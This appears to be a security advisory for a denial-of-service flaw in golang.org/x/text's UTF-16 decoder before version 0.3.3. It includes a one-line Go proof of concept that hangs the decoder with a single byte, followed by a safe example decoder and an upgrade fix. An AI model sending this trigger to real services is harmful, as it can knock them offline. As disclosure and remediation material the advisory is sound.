Denial of Service (DoS) Affecting github.com/golang/text/encoding/unicode package, versions <0.3.3


  • Severity

    High
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • Availability

    High

  • snyk-id

    SNYK-GOLANG-GITHUBCOMGOLANGTEXTENCODINGUNICODE-609610

  • published

    3 Sep 2020

  • disclosed

    9 Jun 2020

  • credit

    Evgeny Kapun

How to fix?

Upgrade github.com/golang/text/encoding/unicode to version 0.3.3 or higher.

Overview

github.com/golang/text/encoding/unicode (imported as golang.org/x/text/encoding/unicode) provides Unicode encodings such as UTF-16.

Affected versions of this package are vulnerable to Denial of Service (DoS). A UTF-16 decoder configured to handle a byte order mark (UseBOM in the PoC below) can be driven into an infinite loop by a single byte of input, because the decoder never makes progress on input shorter than one 16-bit code unit. The program hangs, and may crash or run out of memory. Any code path that decodes attacker-controlled bytes as UTF-16 with such a decoder, for example via Decoder.String, is affected.

PoC

package main

import (
    "fmt"

    "golang.org/x/text/encoding/unicode"
)

func main() {
    // A single byte is not a complete UTF-16 code unit. With UseBOM, the
    // decoder in versions < 0.3.3 never consumes it, so String() never returns.
    res, err := unicode.UTF16(unicode.BigEndian, unicode.UseBOM).NewDecoder().String(" ")
    fmt.Println(res, err)
}
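The PoC above hands the decoder one byte, which is less than a single UTF-16 code unit. The correct behaviour for that input is an error, not a loop. The following is an added example, not code from golang.org/x/text, that shows a minimal BOM-aware UTF-16 decoder built only on the Go standard library: it mirrors the PoC's configuration (big-endian unless a BOM says otherwise), returns an error for truncated input, and never loops. The function and error names are assumptions chosen for illustration, and the inputs in main are constructed.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"unicode/utf16"
)

// Errors for input that is not a whole number of UTF-16 code units. The first
// case (a single byte) is the input the vulnerable decoder looped on.
var (
	ErrShortInput = errors.New("utf16: input shorter than one code unit")
	ErrOddLength  = errors.New("utf16: trailing byte is not a complete code unit")
)

// decodeUTF16WithBOM decodes src as UTF-16. A leading byte order mark selects
// the byte order and is stripped; without a BOM the bytes are read as
// big-endian, matching unicode.UTF16(unicode.BigEndian, unicode.UseBOM) in
// the PoC. Truncated input returns an error instead of hanging.
func decodeUTF16WithBOM(src []byte) (string, error) {
	if len(src) < 2 {
		// Less than one code unit: report it, do not wait for more bytes.
		return "", ErrShortInput
	}
	var order binary.ByteOrder = binary.BigEndian
	switch {
	case src[0] == 0xFE && src[1] == 0xFF:
		order, src = binary.BigEndian, src[2:]
	case src[0] == 0xFF && src[1] == 0xFE:
		order, src = binary.LittleEndian, src[2:]
	}
	if len(src)%2 != 0 {
		return "", ErrOddLength
	}
	units := make([]uint16, 0, len(src)/2)
	for i := 0; i+1 < len(src); i += 2 {
		units = append(units, order.Uint16(src[i:i+2]))
	}
	// utf16.Decode pairs surrogates and replaces unpaired ones with U+FFFD, so
	// every input either decodes here or was rejected above.
	return string(utf16.Decode(units)), nil
}

func main() {
	// Constructed inputs: the PoC's single-byte trigger, a BOM-prefixed
	// big-endian string, a BOM-prefixed little-endian string, and a surrogate pair.
	inputs := [][]byte{
		[]byte(" "),
		{0xFE, 0xFF, 0x00, 0x41, 0x00, 0x42},
		{0xFF, 0xFE, 0x41, 0x00},
		{0xD8, 0x3D, 0xDE, 0x00},
	}
	for _, in := range inputs {
		s, err := decodeUTF16WithBOM(in)
		fmt.Printf("%x -> %q, err=%v\n", in, s, err)
	}
}
```

The point of the example is the first check: a decoder that reads fixed-width code units must treat a partial unit at the end of its input as an error (or, in a streaming decoder, as a short-source condition that the caller resolves by supplying more bytes or ending the stream), never as a state it retries without consuming anything. Until the module is upgraded to 0.3.3, rejecting inputs of fewer than two bytes before they reach the x/text decoder closes the specific trigger shown in the PoC.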